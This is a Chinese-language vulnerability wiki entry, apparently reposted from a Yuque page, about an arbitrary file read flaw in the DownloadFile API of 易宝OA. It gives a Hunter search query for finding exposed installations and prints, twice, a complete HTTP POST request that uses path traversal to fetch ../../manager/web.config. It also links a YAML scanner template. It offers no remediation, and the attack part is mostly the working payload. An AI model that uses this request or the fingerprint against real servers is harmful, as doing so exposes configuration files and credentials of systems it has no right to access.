fofamini-wiki

登录白背景

源码

易宝OA downloadfile 任意文件读取漏洞

一、漏洞简介

易宝OA是一款非常强大的手机办公软件，这里不仅为广大的用户提供了一个更好的工作日历，而且每个人都可以在这里进行重要事项的记录，同时软件中还拥有更好的打卡系统，让用户可以快速记录自己的工作时常，而且调班与补卡也会更加的简单，让你工作活跃度得到提升。易宝OA downloadfile 任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

二、影响版本

易宝OA

三、资产测绘

hunterweb.title="欢迎登录易宝OA系统"||banner="易宝OA"
特征

四、漏洞复现

POST /api/files/DownloadFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Content-Length: 94
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000

易宝OA-downloadfile-文件读取.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/gshn8ebfdyqp3m08

# 易宝OA downloadfile 任意文件读取漏洞

# 一、漏洞简介
易宝OA是一款非常强大的手机办公软件，这里不仅为广大的用户提供了一个更好的工作日历，而且每个人都可以在这里进行重要事项的记录，同时软件中还拥有更好的打卡系统，让用户可以快速记录自己的工作时常，而且调班与补卡也会更加的简单，让你工作活跃度得到提升。易宝OA downloadfile 任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

# 二、影响版本

- 易宝OA

# 三、资产测绘

- hunter`web.title="欢迎登录易宝OA系统"||banner="易宝OA"`
- 特征

![image.png](./img/ReiYQzg2f7exjyss/1700988213496-3ae2a8dc-fa00-47ad-8b54-e4aaa8bc1223-114405.png)

# 四、漏洞复现
```java
POST /api/files/DownloadFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Content-Length: 94
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000 
```
![image.png](./img/ReiYQzg2f7exjyss/1708519051164-715b0af6-6868-4c96-9988-91b1ab23a11d-646835.png)
![image.png](./img/ReiYQzg2f7exjyss/1708519061887-db58cff3-2f53-421f-afea-8224be520489-838376.png)
[易宝OA-downloadfile-文件读取.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219601123-8327317f-62a7-4dca-90a8-46a7b440ebad.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219601123-8327317f-62a7-4dca-90a8-46a7b440ebad.yaml%22%2C%22name%22%3A%22%E6%98%93%E5%AE%9DOA-downloadfile-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.yaml%22%2C%22size%22%3A810%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22uc05dfd73-3dff-4b31-94bc-a1e4ebdf7ed%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22uc37428df%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gshn8ebfdyqp3m08>